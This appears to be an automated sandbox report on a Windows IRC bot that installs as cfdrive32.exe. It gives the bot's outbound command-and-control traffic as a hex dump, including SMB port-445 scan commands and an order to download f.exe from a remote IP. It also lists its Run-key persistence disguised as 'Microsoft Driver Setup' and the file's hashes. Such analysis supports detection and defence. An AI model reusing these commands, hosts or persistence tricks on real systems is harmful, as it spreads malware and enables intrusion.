Remote Host Port Number
109.196.130.50 57221
112.78.112.208 80
218.85.133.201 80
MODE #! -ix
MODE #Ma -ix
USER SP2-668 * 0 :COMPUTERNAME
MODE [N00_USA_XP_0519458]
@ -ix
MODE #dpi -ix
There was an outbound traffic produced on port 57221:
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3035 3139 BCB9 4020 3A73 6361 6E2F | P_0519..@ :scan/
00000030 | 2F20 5472 7969 6E67 2074 6F20 6765 7420 | / Trying to get
00000040 | 6578 7465 726E 616C 2049 502E 0D0A 5052 | external IP…PR
00000050 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000060 | 505F 3035 3139 BCB9 4020 3A73 6361 6E2F | P_0519..@ :scan/
00000070 | 2F20 5261 6E64 6F6D 2050 6F72 7420 5363 | / Random Port Sc
00000080 | 616E 2073 7461 7274 6564 206F 6E20 3139 | an started on 19
00000090 | 322E 782E 782E 783A 3434 3520 7769 7468 | 2.x.x.x:445 with
000000A0 | 2061 2064 656C 6179 206F 6620 3520 7365 | a delay of 5 se
000000B0 | 636F 6E64 7320 666F 7220 3020 6D69 6E75 | conds for 0 minu
000000C0 | 7465 7320 7573 696E 6720 3235 2074 6872 | tes using 25 thr
000000D0 | 6561 6473 2E0D 0A50 5252 564D 5347 205B | eads…PRRVMSG [
000000E0 | 4E30 305F 5553 415F 5850 5F30 3531 39BC | N00_USA_XP_0519.
000000F0 | B940 203A 7363 616E 2F2F 2054 7279 696E | .@ :scan// Tryin
00000100 | 6720 746F 2067 6574 2065 7874 6572 6E61 | g to get externa
00000110 | 6C20 4950 2E0D 0A50 5252 564D 5347 205B | l IP…PRRVMSG [
00000120 | 4E30 305F 5553 415F 5850 5F30 3531 39BC | N00_USA_XP_0519.
00000130 | B940 203A 7363 616E 2F2F 2052 616E 646F | .@ :scan// Rando
00000140 | 6D20 506F 7274 2053 6361 6E20 7374 6172 | m Port Scan star
00000150 | 7465 6420 6F6E 2031 3932 2E31 3638 2E78 | ted on 192.168.x
00000160 | 2E78 3A34 3435 2077 6974 6820 6120 6465 | .x:445 with a de
00000170 | 6C61 7920 6F66 2035 2073 6563 6F6E 6473 | lay of 5 seconds
00000180 | 2066 6F72 2030 206D 696E 7574 6573 2075 | for 0 minutes u
00000190 | 7369 6E67 2032 3520 7468 7265 6164 732E | sing 25 threads.
000001A0 | 0D0A 5052 5256 4D53 4720 5B4E 3030 5F55 | ..PRRVMSG [N00_U
000001B0 | 5341 5F58 505F 3035 3139 BCB9 4020 3A73 | SA_XP_0519..@ :s
000001C0 | 6361 6E2F 2F20 5365 7175 656E 7469 616C | can// Sequential
000001D0 | 2050 6F72 7420 5363 616E 2073 7461 7274 | Port Scan start
000001E0 | 6564 206F 6E20 3139 322E 3136 382E 302E | ed on 192.168.0.
000001F0 | 303A 3434 3520 7769 7468 2061 2064 656C | 0:445 with a del
00000200 | 6179 206F 6620 3520 7365 636F 6E64 7320 | ay of 5 seconds
00000210 | 666F 7220 3020 6D69 6E75 7465 7320 7573 | for 0 minutes us
00000220 | 696E 6720 3230 2074 6872 6561 6473 2E0D | ing 20 threads..
00000230 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
00000240 | 415F 5850 5F30 3531 39BC B940 203A 7363 | A_XP_0519..@ :sc
00000250 | 616E 2F2F 2053 6571 7565 6E74 6961 6C20 | an// Sequential
00000260 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
00000270 | 6420 6F6E 2031 3932 2E31 3638 2E38 302E | d on 192.168.80.
00000280 | 303A 3434 3520 7769 7468 2061 2064 656C | 0:445 with a del
00000290 | 6179 206F 6620 3520 7365 636F 6E64 7320 | ay of 5 seconds
000002A0 | 666F 7220 3020 6D69 6E75 7465 7320 7573 | for 0 minutes us
000002B0 | 696E 6720 3230 2074 6872 6561 6473 2E0D | ing 20 threads..
000002C0 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000002D0 | 415F 5850 5F30 3531 39BC B940 203A 7363 | A_XP_0519..@ :sc
000002E0 | 616E 2F2F 2053 6571 7565 6E74 6961 6C20 | an// Sequential
000002F0 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
00000300 | 6420 6F6E 2031 3932 2E30 2E30 2E30 3A34 | d on 192.0.0.0:4
00000310 | 3435 2077 6974 6820 6120 6465 6C61 7920 | 45 with a delay
00000320 | 6F66 2035 2073 6563 6F6E 6473 2066 6F72 | of 5 seconds for
00000330 | 2030 206D 696E 7574 6573 2075 7369 6E67 | 0 minutes using
00000340 | 2031 3020 7468 7265 6164 732E 0D0A 4E43 | 10 threads…NC
00000350 | 494B 205B 4E30 305F 5553 415F 5850 5F30 | IK [N00_USA_XP_0
00000360 | 3531 3934 3538 5D18 E740 0D0A 7365 6E64 | 519458]..@..send
00000370 | 2023 212C 234D 6120 6F6F 6F6F 0D0A 5052 | #!,#Ma oooo..PR
00000380 | 5256 4D53 4720 2369 203A 4854 5450 2053 | RVMSG #i :HTTP S
00000390 | 4554 2068 7474 703A 2F2F 3230 382E 3533 | ET http://208.53
000003A0 | 2E31 3833 2E31 3731 2F66 2E65 7865 0D0A | .183.171/f.exe..
* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
Other details
* The following ports were open in the system:
Port Protocol Process
1053 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
1055 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2259 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2260 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2261 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2262 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2272 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2273 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2274 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2275 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2276 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2277 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
2278 TCP cfdrive32.exe (%Windir%cfdrive32.exe)
Registry Modifications
* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%Windir%cfdrive32.exe”
so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Driver Setup = “%Windir%cfdrive32.exe”
so that cfdrive32.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
cfdrive32.exe %Windir%cfdrive32.exe 352 256 bytes
File System Modifications
* The following file was created in the system:
# Filename(s) File Size File Hash
1 %Windir%cfdrive32.exe
[file and pathname of the sample #1] 86 016 bytes MD5: 0x91CF319F0936F134818632CB1B124EEA
SHA-1: 0x58F72A8883077FCF53EB5EB77D4FF3B82CB54926